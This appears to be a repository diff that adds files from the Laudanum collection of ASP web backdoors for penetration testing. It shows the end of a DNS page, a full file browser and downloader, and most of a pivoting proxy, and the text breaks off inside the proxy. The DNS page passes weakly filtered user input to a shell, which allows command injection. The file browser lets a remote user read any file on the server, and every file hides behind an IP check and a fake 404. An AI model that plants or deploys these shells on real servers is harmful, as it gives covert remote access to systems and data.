' *** This program is distributed in the hope that it will be useful,
|
||||||
|
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
' *** GNU General Public License for more details.
|
||||||
|
' ***
|
||||||
|
' *** You can get a copy of the GNU General Public License from this
|
||||||
|
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||||
|
' *** Place - Suite Boston, MA USA.
|
||||||
|
' ***
|
||||||
|
' ***************************************************************************** */
|
||||||
|
|
||||||
|
' ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
' IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
Dim allowedIPs
|
||||||
|
Dim allowed
|
||||||
|
Dim qtypes
|
||||||
|
Dim qtype
|
||||||
|
Dim validtype
|
||||||
|
Dim query
|
||||||
|
Dim i
|
||||||
|
Dim command
|
||||||
|
|
||||||
|
allowedIPs = "192.168.0.1,127.0.0.1"
|
||||||
|
' Just in cace you added a space in the line above
|
||||||
|
allowedIPs = replace(allowedIPS," ","")
|
||||||
|
'turn it into an array
|
||||||
|
allowedIPs = split(allowedIPS,",") '
|
||||||
|
|
||||||
|
' make sure the ip is allowed
|
||||||
|
allowed = 0
|
||||||
|
for i = lbound(allowedIPs) to ubound(allowedIPs)
|
||||||
|
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
|
||||||
|
allowed = 1
|
||||||
|
Exit For
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
' send a 404 if not the allowed IP
|
||||||
|
if allowed = 0 then
|
||||||
|
Response.Status = "404 File Not Found"
|
||||||
|
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
|
||||||
|
Response.End
|
||||||
|
end if
|
||||||
|
|
||||||
|
%>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum ASP DNS Access</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
function init() {
|
||||||
|
document.dns.query.focus();
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>DNS Query 0.1</h1>
|
||||||
|
<%
|
||||||
|
|
||||||
|
' dns query types as defined as by windows nslookup
|
||||||
|
qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",")
|
||||||
|
qtype = UCase(Request.Form("type"))
|
||||||
|
|
||||||
|
' see if the query type is valid, if it isn't then set it.
|
||||||
|
validtype = 0
|
||||||
|
for i = lbound(qtypes) to ubound(qtypes)
|
||||||
|
if qtype = qtypes(i) then
|
||||||
|
validtype = 1
|
||||||
|
Exit For
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
if validtype = 0 then qtype = "ANY"
|
||||||
|
|
||||||
|
%>
|
||||||
|
<form name="dns" method="POST">
|
||||||
|
<fieldset>
|
||||||
|
<legend>DNS Lookup:</legend>
|
||||||
|
<p>Query:<input name="query" type="text">
|
||||||
|
Type:<select name="type">
|
||||||
|
<%
|
||||||
|
for i = lbound(qtypes) to ubound(qtypes)
|
||||||
|
if qtype = qtypes(i) then
|
||||||
|
Response.Write("<option value=""" & qtypes(i) & """ SELECTED>" & qtypes(i) & "</option>")
|
||||||
|
else
|
||||||
|
|
||||||
|
Response.Write("<option value=""" & qtypes(i) & """>" & qtypes(i) & "</option>")
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
%>
|
||||||
|
</select>
|
||||||
|
<input type="submit" value="Submit">
|
||||||
|
</fieldset>
|
||||||
|
</form>
|
||||||
|
<%
|
||||||
|
|
||||||
|
' get the query
|
||||||
|
query = trim(Request.Form("query"))
|
||||||
|
' the query must be sanitized a bit to try to make sure the shell doesn't hang
|
||||||
|
query = replace(query, " ", "")
|
||||||
|
query = replace(query, ";", "")
|
||||||
|
|
||||||
|
if len(query) > 0 then
|
||||||
|
command = "nslookup -type=" & qtype & " " & query
|
||||||
|
Set objWShell = Server.CreateObject("WScript.Shell")
|
||||||
|
Set objCmd = objWShell.Exec(command)
|
||||||
|
strPResult = objCmd.StdOut.Readall()
|
||||||
|
set objCmd = nothing: Set objWShell = nothing
|
||||||
|
%><pre><%
|
||||||
|
Response.Write command & "<br>"
|
||||||
|
Response.Write replace(strPResult,vbCrLf,"<br>")
|
||||||
|
%></pre><%
|
||||||
|
end if
|
||||||
|
%>
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
179
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp
Normal file
179
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp
Normal file
@@ -0,0 +1,179 @@
|
|||||||
|
<%@Language="VBScript"%>
|
||||||
|
<%Option Explicit%>
|
||||||
|
<%Response.Buffer = True%>
|
||||||
|
<%
|
||||||
|
' *******************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** Laudanum Project
|
||||||
|
' *** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
' ***
|
||||||
|
' *** More information is available at:
|
||||||
|
' *** http://laudanum.secureideas.net
|
||||||
|
' *** laudanum@secureideas.net
|
||||||
|
' ***
|
||||||
|
' *** Project Leads:
|
||||||
|
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
' *** Tim Medin <tim@securitywhole.com>
|
||||||
|
' ***
|
||||||
|
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** This file provides access to the file system.
|
||||||
|
' *** Written by Tim Medin <timmedin@gmail.com>
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' *** This program is free software; you can redistribute it and/or
|
||||||
|
' *** modify it under the terms of the GNU General Public License
|
||||||
|
' *** as published by the Free Software Foundation; either version 2
|
||||||
|
' *** of the License, or (at your option) any later version.
|
||||||
|
' ***
|
||||||
|
' *** This program is distributed in the hope that it will be useful,
|
||||||
|
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
' *** GNU General Public License for more details.
|
||||||
|
' ***
|
||||||
|
' *** You can get a copy of the GNU General Public License from this
|
||||||
|
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||||
|
' *** Place - Suite Boston, MA USA.
|
||||||
|
' ***
|
||||||
|
' ***************************************************************************** */
|
||||||
|
|
||||||
|
' ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
' Define variables
|
||||||
|
Dim allowedIPs
|
||||||
|
Dim allowed
|
||||||
|
Dim filepath
|
||||||
|
Dim file
|
||||||
|
Dim stream
|
||||||
|
Dim path
|
||||||
|
Dim i
|
||||||
|
Dim fso
|
||||||
|
Dim folder
|
||||||
|
Dim list
|
||||||
|
Dim temppath
|
||||||
|
|
||||||
|
' IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
allowedIPs = "192.168.0.1,127.0.0.1,::1"
|
||||||
|
' Just in cace you added a space in the line above
|
||||||
|
allowedIPs = replace(allowedIPS," ","")
|
||||||
|
'turn it into an array
|
||||||
|
allowedIPs = split(allowedIPS,",") '
|
||||||
|
' make sure the ip is allowed
|
||||||
|
allowed = 0
|
||||||
|
for i = lbound(allowedIPs) to ubound(allowedIPs)
|
||||||
|
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
|
||||||
|
allowed = 1
|
||||||
|
exit for
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
' send a 404 if the IP Address is not allowed
|
||||||
|
if allowed = 0 then
|
||||||
|
Response.Status = "404 File Not Found"
|
||||||
|
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
|
||||||
|
Response.End
|
||||||
|
end if
|
||||||
|
|
||||||
|
' create file object for use everywhere
|
||||||
|
set fso = CreateObject("Scripting.FileSystemObject")
|
||||||
|
|
||||||
|
' download a file if selected
|
||||||
|
filepath = trim(Request.QueryString("file"))
|
||||||
|
'validate file
|
||||||
|
if len(filepath) > 0 then
|
||||||
|
if fso.FileExists(filepath) then
|
||||||
|
'valid file
|
||||||
|
|
||||||
|
Set file = fso.GetFile(filepath)
|
||||||
|
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
|
||||||
|
'Response.AddHeader "Content-Length", file.Size
|
||||||
|
Response.ContentType = "application/octet-stream"
|
||||||
|
set stream = Server.CreateObject("ADODB.Stream")
|
||||||
|
stream.Open
|
||||||
|
stream.Type = 1
|
||||||
|
Response.Charset = "UTF-8"
|
||||||
|
stream.LoadFromFile(file.Path)
|
||||||
|
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
|
||||||
|
Response.BinaryWrite(stream.Read)
|
||||||
|
stream.Close
|
||||||
|
set stream = Nothing
|
||||||
|
set file = Nothing
|
||||||
|
Response.End
|
||||||
|
end if
|
||||||
|
end if
|
||||||
|
|
||||||
|
' begin rendering the page
|
||||||
|
%>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum ASP File Browser</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<h1>Laudanum File Browser 0.1</h1>
|
||||||
|
|
||||||
|
<%
|
||||||
|
' get the path to work with, if it isn't set or valid then start with the web root
|
||||||
|
' goofy if statement is used since vbscript doesn't use short-curcuit logic
|
||||||
|
path = trim(Request.QueryString("path"))
|
||||||
|
if len(path) = 0 then
|
||||||
|
path = fso.GetFolder(Server.MapPath("\"))
|
||||||
|
elseif not fso.FolderExists(path) then
|
||||||
|
path = fso.GetFolder(Server.MapPath("\"))
|
||||||
|
end if
|
||||||
|
|
||||||
|
set folder = fso.GetFolder(path)
|
||||||
|
|
||||||
|
' Special locations, webroot and drives
|
||||||
|
%><b>Other Locations:</b> <%
|
||||||
|
for each i in fso.Drives
|
||||||
|
if i.IsReady then
|
||||||
|
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a> <%
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
|
||||||
|
|
||||||
|
' Information on folder
|
||||||
|
%><h2>Listing of: <%
|
||||||
|
list = split(folder.path, "\")
|
||||||
|
temppath = ""
|
||||||
|
for each i in list
|
||||||
|
temppath = temppath & i & "\"
|
||||||
|
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
|
||||||
|
next
|
||||||
|
%></h2><%
|
||||||
|
|
||||||
|
' build table for listing
|
||||||
|
%><table>
|
||||||
|
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
|
||||||
|
' Parent Path if it exists
|
||||||
|
if not folder.IsRootFolder then
|
||||||
|
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
|
||||||
|
end if
|
||||||
|
|
||||||
|
' Get the folders
|
||||||
|
set list = folder.SubFolders
|
||||||
|
for each i in list
|
||||||
|
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
|
||||||
|
next
|
||||||
|
|
||||||
|
' Get the files
|
||||||
|
set list = folder.Files
|
||||||
|
for each i in list
|
||||||
|
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
|
||||||
|
next
|
||||||
|
|
||||||
|
' all done
|
||||||
|
%>
|
||||||
|
</table>
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
454
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp
Normal file
454
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp
Normal file
@@ -0,0 +1,454 @@
|
|||||||
|
<%@Language="VBScript"%>
|
||||||
|
<%Option Explicit%>
|
||||||
|
<%Response.Buffer = True%>
|
||||||
|
<%
|
||||||
|
' *******************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** Laudanum Project
|
||||||
|
' *** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
' ***
|
||||||
|
' *** More information is available at:
|
||||||
|
' *** http://laudanum.secureideas.net
|
||||||
|
' *** laudanum@secureideas.net
|
||||||
|
' ***
|
||||||
|
' *** Project Leads:
|
||||||
|
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
' *** Tim Medin <tim@securitywhole.com>
|
||||||
|
' ***
|
||||||
|
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** This file provides access as a proxy.
|
||||||
|
' *** Written by Tim Medin <timmedin@gmail.com>
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' *** This program is free software; you can redistribute it and/or
|
||||||
|
' *** modify it under the terms of the GNU General Public License
|
||||||
|
' *** as published by the Free Software Foundation; either version 2
|
||||||
|
' *** of the License, or (at your option) any later version.
|
||||||
|
' ***
|
||||||
|
' *** This program is distributed in the hope that it will be useful,
|
||||||
|
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
' *** GNU General Public License for more details.
|
||||||
|
' ***
|
||||||
|
' *** You can get a copy of the GNU General Public License from this
|
||||||
|
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||||
|
' *** Place - Suite Boston, MA USA.
|
||||||
|
' ***
|
||||||
|
' ***************************************************************************** */
|
||||||
|
|
||||||
|
' ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
' Define variables
|
||||||
|
Dim allowedIPs
|
||||||
|
Dim allowed
|
||||||
|
Dim i
|
||||||
|
Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
|
||||||
|
Dim urltemp
|
||||||
|
Dim urlscheme
|
||||||
|
Dim urlhost
|
||||||
|
Dim urlport
|
||||||
|
Dim urlpath
|
||||||
|
Dim urlfile
|
||||||
|
Dim urlquery
|
||||||
|
Dim http
|
||||||
|
Dim method
|
||||||
|
Dim contenttype
|
||||||
|
Dim stream
|
||||||
|
Dim regex
|
||||||
|
Dim body
|
||||||
|
Dim params
|
||||||
|
|
||||||
|
function err_handler()
|
||||||
|
%>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum ASP Proxy</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Fatal Error!</h1>
|
||||||
|
<%=Err.Number%><br/>
|
||||||
|
<%=Err.Message%><br/>
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</body>
|
||||||
|
</html><%
|
||||||
|
end function
|
||||||
|
|
||||||
|
function CleanQueryString
|
||||||
|
' removes laudurl from the querystring
|
||||||
|
Dim i
|
||||||
|
Dim j
|
||||||
|
Dim s
|
||||||
|
Dim key
|
||||||
|
Dim q
|
||||||
|
|
||||||
|
|
||||||
|
if len(request.querystring) = 0 then
|
||||||
|
CleanQueryString = ""
|
||||||
|
exit function
|
||||||
|
end if
|
||||||
|
|
||||||
|
' build the request parameters
|
||||||
|
for i = 1 to request.querystring.count
|
||||||
|
key = request.querystring.key(i)
|
||||||
|
'response.write "<br/>key:" & key
|
||||||
|
if key = "laudurl" then
|
||||||
|
' if the key is laudurl, we need check if there is a ? in the string since
|
||||||
|
' it may have its own query string that doesn't get parsed properly.
|
||||||
|
s = split(request.querystring("laudurl"), "?")
|
||||||
|
if ubound(s) > lbound(s) then
|
||||||
|
' laudurl contains a ?, it must be manually parsed
|
||||||
|
key = left(s(1), instr(s(1), "=") - 1)
|
||||||
|
q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
|
||||||
|
end if
|
||||||
|
else
|
||||||
|
for j = 1 to request.querystring(key).count
|
||||||
|
'response.write "<br/> -value:" & request.querystring(key)(j)
|
||||||
|
q = q & "&" & key & "=" & request.querystring(key)(j)
|
||||||
|
next
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
|
||||||
|
if len(q) > 0 then
|
||||||
|
CleanQueryString = "?" & mid(q, 2)
|
||||||
|
else
|
||||||
|
CleanQueryString = ""
|
||||||
|
end if
|
||||||
|
end function
|
||||||
|
|
||||||
|
function CleanFormValues()
|
||||||
|
Dim r
|
||||||
|
Set r = New RegExp
|
||||||
|
r.IgnoreCase = true
|
||||||
|
r.Global = true
|
||||||
|
|
||||||
|
' remove the laudurl paramater
|
||||||
|
r.Pattern = "laudurl=[^&]+($|&)"
|
||||||
|
CleanFormValues = r.Replace(request.form, "")
|
||||||
|
Set r = nothing
|
||||||
|
end function
|
||||||
|
|
||||||
|
sub ParseUrl()
|
||||||
|
' parses the url into the global variables
|
||||||
|
Dim urltemp
|
||||||
|
Dim url
|
||||||
|
|
||||||
|
'get the url, it may be in the querystring for a get or from a form in a post
|
||||||
|
url = Request.QueryString("laudurl")
|
||||||
|
if url = "" then
|
||||||
|
url = Request.Form("laudurl")
|
||||||
|
end if
|
||||||
|
|
||||||
|
if url = "" then
|
||||||
|
urlscheme = ""
|
||||||
|
urlhost = ""
|
||||||
|
urlport = ""
|
||||||
|
urlpath = ""
|
||||||
|
urlfile = ""
|
||||||
|
urlquery = ""
|
||||||
|
exit sub
|
||||||
|
end if
|
||||||
|
|
||||||
|
' Parse the url and break it into its components
|
||||||
|
' this is done so it can be used to rewrite the page
|
||||||
|
|
||||||
|
' ensure the url has a scheme, if it doesn't then assume http
|
||||||
|
if instr(url,"://") = 0 then url = "http://" + url
|
||||||
|
|
||||||
|
' Get the scheme
|
||||||
|
urlscheme = split(url, "://")(0) & "://"
|
||||||
|
|
||||||
|
' urltemp is used to hold the remainder of the url as each portion is parsed
|
||||||
|
urltemp = mid(url, len(urlscheme) + 1)
|
||||||
|
'get the host
|
||||||
|
if instr(urltemp, "/") = 0 then
|
||||||
|
' there is no path so all that is left is the host
|
||||||
|
urlhost = urltemp
|
||||||
|
urlport = ""
|
||||||
|
urlpath = "/"
|
||||||
|
urlfile = ""
|
||||||
|
urlport = ""
|
||||||
|
else
|
||||||
|
' there is more that just the hostname remaining
|
||||||
|
urlhost = left(urltemp, instr(urltemp, "/") - 1)
|
||||||
|
urltemp = mid(urltemp, len(urlhost) + 1)
|
||||||
|
|
||||||
|
' is there a port
|
||||||
|
if instr(urlhost, ":") = 0 then
|
||||||
|
' no port
|
||||||
|
urlport = ""
|
||||||
|
else
|
||||||
|
' there is a port
|
||||||
|
arr = split(urlhost, ":")
|
||||||
|
urlhost = arr(0)
|
||||||
|
urlport = ":" & arr(1)
|
||||||
|
end if
|
||||||
|
|
||||||
|
' all that is left is the path and the query
|
||||||
|
' is there a query?
|
||||||
|
if instr(urltemp, "?") = 0 then
|
||||||
|
' no query
|
||||||
|
urlpath = urltemp
|
||||||
|
'urlquery = ""
|
||||||
|
else
|
||||||
|
'Response.Write "<br><br>" & urltemp & "<br><br>"
|
||||||
|
urlpath = left(urltemp, instr(urltemp, "?") - 1)
|
||||||
|
'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
|
||||||
|
end if
|
||||||
|
|
||||||
|
if right(urlpath, 1) = "/" then
|
||||||
|
urlfile = ""
|
||||||
|
else
|
||||||
|
' we need to get the path and the file
|
||||||
|
urltemp = split(urlpath, "/")
|
||||||
|
urlfile = urltemp(ubound(urltemp))
|
||||||
|
urlpath = left(urlpath, len(urlpath) - len(urlfile))
|
||||||
|
end if
|
||||||
|
end if
|
||||||
|
|
||||||
|
urlquery = CleanQueryString
|
||||||
|
|
||||||
|
'response.write "<br>scheme: " & urlscheme
|
||||||
|
'response.write "<br>host: " & urlhost
|
||||||
|
'response.write "<br>port: " & urlport
|
||||||
|
'response.write "<br>path: " & urlpath
|
||||||
|
'response.write "<br>file: " & urlfile
|
||||||
|
'response.write "<br>query: " & urlquery
|
||||||
|
'response.write "<br>full: " & FullUrl()
|
||||||
|
'response.end
|
||||||
|
end sub
|
||||||
|
|
||||||
|
function FullUrl()
|
||||||
|
FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
|
||||||
|
end function
|
||||||
|
|
||||||
|
sub RewriteHeaders()
|
||||||
|
Dim i
|
||||||
|
Dim header
|
||||||
|
Dim headervalue
|
||||||
|
Dim regexdomain
|
||||||
|
Dim regexpath
|
||||||
|
|
||||||
|
' setup a regular expression to clean the cookie's domain and path
|
||||||
|
Set regexdomain = New RegExp
|
||||||
|
regexdomain.IgnoreCase = true
|
||||||
|
regexdomain.Global = true
|
||||||
|
' rewrite images and links - absolute reference
|
||||||
|
regexdomain.Pattern = "domain=[\S]+"
|
||||||
|
|
||||||
|
Set regexpath = New RegExp
|
||||||
|
regexpath.IgnoreCase = true
|
||||||
|
regexpath.Global = true
|
||||||
|
' rewrite images and links - absolute reference
|
||||||
|
regexpath.Pattern = "path=[\S]+"
|
||||||
|
|
||||||
|
' go through each header
|
||||||
|
for each i in Split(http.getAllResponseHeaders, vbLf)
|
||||||
|
' Break on the \x0a and remove the \x0d if it exists
|
||||||
|
i = Replace(i, vbCr, "")
|
||||||
|
' make sure it is a header and value
|
||||||
|
if instr(i, ":") > 0 then
|
||||||
|
' break the response headers into header and value
|
||||||
|
header = trim(Left(i, instr(i, ":") - 1))
|
||||||
|
header = replace(header, "_", "-")
|
||||||
|
headervalue = trim(Right(i, len(i) - instr(i, ":")))
|
||||||
|
|
||||||
|
' don't add these two header types since they are handled automatically
|
||||||
|
if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
|
||||||
|
if lcase(header) = "set-cookie" then
|
||||||
|
' strip the domain from the cookie
|
||||||
|
headervalue = regexdomain.replace(headervalue, "")
|
||||||
|
' strip the path from the cookie
|
||||||
|
headervalue = regexpath.replace(headervalue, "")
|
||||||
|
headervalue = trim(headervalue)
|
||||||
|
end if
|
||||||
|
response.AddHeader header, headervalue
|
||||||
|
end if
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
|
||||||
|
Set regexdomain = nothing
|
||||||
|
Set regexpath = nothing
|
||||||
|
end sub
|
||||||
|
|
||||||
|
' TODO: Add authentication support so it will work behind a proxy
|
||||||
|
' IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
allowedIPs = "192.168.0.1,127.0.0.1,::1"
|
||||||
|
' Just in cace you added a space in the line above
|
||||||
|
allowedIPs = replace(allowedIPS," ","")
|
||||||
|
'turn it into an array
|
||||||
|
allowedIPs = split(allowedIPS,",") '
|
||||||
|
' make sure the ip is allowed
|
||||||
|
' TODO: change this to 0 for production, it is 1 for testing
|
||||||
|
allowed = 0
|
||||||
|
for i = lbound(allowedIPs) to ubound(allowedIPs)
|
||||||
|
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
|
||||||
|
allowed = 1
|
||||||
|
exit for
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
' send a 404 if the IP Address is not allowed
|
||||||
|
if allowed = 0 then
|
||||||
|
Response.Status = "404 File Not Found"
|
||||||
|
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
|
||||||
|
Response.End
|
||||||
|
end if
|
||||||
|
|
||||||
|
|
||||||
|
'initialize variables
|
||||||
|
Set http = nothing
|
||||||
|
Set regex = nothing
|
||||||
|
Set stream = nothing
|
||||||
|
|
||||||
|
' Define Constants
|
||||||
|
const useMSXML2 = 0
|
||||||
|
const chunkSize = 1048576 ' 1MB
|
||||||
|
|
||||||
|
' parse the url into its parts
|
||||||
|
ParseUrl()
|
||||||
|
|
||||||
|
' check if there is a valid url
|
||||||
|
if len(FullUrl) = 0 then
|
||||||
|
' no url to proxy, give `em the boring default page
|
||||||
|
|
||||||
|
' Default layout of the page
|
||||||
|
' First thing you get when you hit the page without giving it a URL
|
||||||
|
%>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum ASP Proxy</title>
|
||||||
|
<script type="text/javascript">
|
||||||
|
function init() {
|
||||||
|
document.proxy.url.focus();
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>Laudanum ASP Proxy</h1>
|
||||||
|
|
||||||
|
<form method="GET" name="proxy" action="<%=Request.ServerVariables("URL")%>">
|
||||||
|
<input type="text" name="laudurl" size="70">
|
||||||
|
<input type="submit" value="Submit">
|
||||||
|
</form>
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</body>
|
||||||
|
</html> <%
|
||||||
|
|
||||||
|
Response.End()
|
||||||
|
end if
|
||||||
|
|
||||||
|
' Let's get our Proxy on!!!
|
||||||
|
' define the request type
|
||||||
|
if useMSXML2 = 1 then
|
||||||
|
Set http = Server.CreateObject("MSXML2.XMLHTTP")
|
||||||
|
else
|
||||||
|
Set http = Server.CreateObject("Microsoft.XMLHTTP")
|
||||||
|
end if
|
||||||
|
|
||||||
|
' get the request type
|
||||||
|
method = Request.ServerVariables("REQUEST_METHOD")
|
||||||
|
|
||||||
|
' setup the request, false means don't send it yet
|
||||||
|
http.Open method, FullUrl, False
|
||||||
|
|
||||||
|
' send the request
|
||||||
|
if method = "POST" then
|
||||||
|
params = CleanFormValues
|
||||||
|
http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
|
||||||
|
http.setRequestHeader "Content-length", len(params)
|
||||||
|
http.setRequestHeader "Connection", "close"
|
||||||
|
http.Send(params)
|
||||||
|
else
|
||||||
|
http.Send
|
||||||
|
end if
|
||||||
|
|
||||||
|
' Replace the normal headers with the ones from the response
|
||||||
|
Response.Clear
|
||||||
|
contenttype = http.getResponseHeader("Content-Type")
|
||||||
|
Response.ContentType = contenttype
|
||||||
|
|
||||||
|
' rewrite the headers. Takes headers and passes them to new request
|
||||||
|
RewriteHeaders()
|
||||||
|
|
||||||
|
' how to respond? is it text or is it something else?
|
||||||
|
if lcase(left(contenttype, 4)) = "text" then
|
||||||
|
' response is text, so we need to rewrite it, but that's later
|
||||||
|
|
||||||
|
|
||||||
|
' do the rewriting
|
||||||
|
body = http.responseText
|
||||||
|
|
||||||
|
Set regex = New RegExp
|
||||||
|
regex.IgnoreCase = true
|
||||||
|
regex.Global = true
|
||||||
|
|
||||||
|
' rewrite images and links - absolute reference
|
||||||
|
s = urlscheme & urlhost & urlport
|
||||||
|
regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
|
||||||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
|
||||||
|
|
||||||
|
' rewrite images and links - full reference
|
||||||
|
regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
|
||||||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3")
|
||||||
|
|
||||||
|
' rewrite images and links - absolute reference
|
||||||
|
s = urlscheme & urlhost & urlport & urlpath
|
||||||
|
regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
|
||||||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
|
||||||
|
|
||||||
|
|
||||||
|
' rewrite forms - absolute reference
|
||||||
|
s = urlscheme & urlhost & urlport
|
||||||
|
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
|
||||||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
|
||||||
|
|
||||||
|
' rewrite forms - full reference
|
||||||
|
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
|
||||||
|
